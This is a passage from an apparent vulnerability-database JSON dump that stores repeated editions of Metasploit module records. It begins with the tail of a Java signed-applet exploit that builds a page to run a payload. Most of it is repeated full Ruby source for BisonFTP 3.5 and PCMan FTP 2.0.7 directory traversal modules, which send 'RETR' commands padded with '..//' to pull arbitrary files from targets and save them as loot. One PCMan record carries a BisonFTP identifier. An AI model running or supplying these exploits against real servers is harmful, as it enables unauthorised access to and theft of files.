as RSA and fallback to DSA if that doesn't work\n begin\n @key = OpenSSL::PKey::RSA.new(cert_str, datastore[\"SigningKeyPass\"])\n rescue OpenSSL::PKey::RSAError => e\n @key = OpenSSL::PKey::DSA.new(cert_str, datastore[\"SigningKeyPass\"])\n end\n end\n else\n # Name.parse uses a simple regex that isn't smart enough to allow\n # slashes or commas in values, just remove them.\n certcn = datastore[\"CERTCN\"].gsub(%r|[/,]|, \"\")\n x509_name = OpenSSL::X509::Name.parse(\n \"C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=#{certcn}\"\n )\n\n @key = OpenSSL::PKey::DSA.new(1024)\n @cert = OpenSSL::X509::Certificate.new\n @cert.version = 2\n @cert.serial = 1\n @cert.subject = x509_name\n @cert.issuer = x509_name\n @cert.public_key = @key.public_key\n @cert.not_before = Time.now\n # FIXME: this will break in the year 2037 on 32-bit systems\n @cert.not_after = @cert.not_before + 3600 * 24 * 365 # 1 year\n end\n end\n\n\n def generate_html\n html = %Q|<html><head><title>Loading, Please Wait...</title></head>\\n|\n html << %Q|<body><center><p>Loading, Please Wait...</p></center>\\n|\n html << %Q|<applet archive=\"#{get_resource.sub(%r|/$|, '')}/#{datastore[\"APPLETNAME\"]}.jar\"\\n|\n vprint_line(html)\n if @use_static\n html << %Q| code=\"SiteLoader\" width=\"1\" height=\"1\">\\n|\n else\n html << %Q| code=\"#{datastore[\"APPLETNAME\"]}\" width=\"1\" height=\"1\">\\n|\n end\n html << %Q|</applet>\\n</body></html>|\n return html\n end\n\n\n # Currently unused until we ship a java compiler of some sort\n def applet_code\n applet = <<-EOS\nimport java.applet.*;\nimport metasploit.*;\n\npublic class #{datastore[\"APPLETNAME\"]} extends Applet {\n public void init() {\n try {\n Payload.main(null);\n } catch (Exception ex) {\n //ex.printStackTrace();\n }\n }\n}\nEOS\n end\nend\n\n=begin\n\nThe following stores a bunch of intermediate files on the path to creating the signature. 
The\nImportKey class used for testing was obtained from:\nhttp://www.agentbob.info/agentbob/79-AB.html\n\n system(\"rm -rf signed_jar/*\")\n File.open(\"signed_jar/cert.pem\", \"wb\") { |f| f.write(@cert.to_s + @key.to_s) }\n File.open(\"signed_jar/key.pem\", \"wb\") { |f| f.write(@key.to_s + @key.public_key.to_s) }\n File.open(\"signed_jar/unsigned.jar\", \"wb\") { |f| f.write jar.to_s }\n\n File.open(\"signed_jar/jarsigner-signed.jar\", \"wb\") { |f| f.write jar.to_s }\n system(\"openssl x509 -in signed_jar/cert.pem -inform PEM -out signed_jar/cert.der -outform DER\")\n system(\"openssl pkcs8 -topk8 -nocrypt -in signed_jar/key.pem -inform PEM -out signed_jar/key.der -outform DER\")\n system(\"java -cp . ImportKey signed_jar/key.der signed_jar/cert.der\")\n system(\"mv ~/keystore.ImportKey ~/.keystore\")\n system(\"jarsigner -storepass importkey signed_jar/jarsigner-signed.jar importkey\")\n\n jar.sign(@key, @cert)\n File.open(\"signed_jar/signed.jar\", \"wb\") { |f| f.write jar.to_s }\n\n=end\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-29T04:56:55", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 51}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "f4d66f1263e106dbd0d9bb71c33f83d7", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-05-29T06:29:45", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-05-29T06:29:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-29T06:29:45", "differentElements": ["cvss"], "edition": 52}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-05-29T14:23:44", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-05-29T06:29:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-29T14:23:44", "differentElements": ["cvelist", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 53}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "30e61a80bd64e31683a2cb002769a675", "type": "metasploit", "bulletinFamily": "exploit", "title": "PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal strings such as '..//'\n", "published": "2015-11-08T05:08:23", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7601"], "cvelist": ["CVE-2015-7601"], "lastseen": "2019-06-08T16:26:27", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-05-29T06:29:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7.\n This vulnerability allows an attacker to download arbitrary files from the server by crafting\n a RETR command that includes file system traversal strings such as '..//'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts', # initial discovery\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38340'],\n [ 'CVE', '2015-7601']\n ],\n 'DisclosureDate' => 'Sep 
28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n end\n\n def check_host(ip)\n begin\n connect\n if /220 PCMan's FTP Server 2\\.0/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n # Login anonymously and open the socket that we'll use for data retrieval.\n connect_login\n sock = data_connect\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file_path} not found\")\n return\n end\n\n if response_data.length == 0 or ! 
(res =~ /^150/ )\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"pcman.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-08T16:26:27", "differentElements": ["cvelist", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 54}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-06-08T18:34:02", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-06-08T18:34:02"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-06-08T18:34:02"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-08T18:34:02", "differentElements": ["modified", "published"], "edition": 55}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "4a45d8a912178abfeaf285407e747950", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-06-18T02:24:09", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-06-08T18:34:02"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-06-08T18:34:02"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-18T02:24:09", "differentElements": ["modified", "published"], "edition": 56}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-06-18T04:31:49", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-06-18T04:31:49"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-06-18T04:31:49"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume 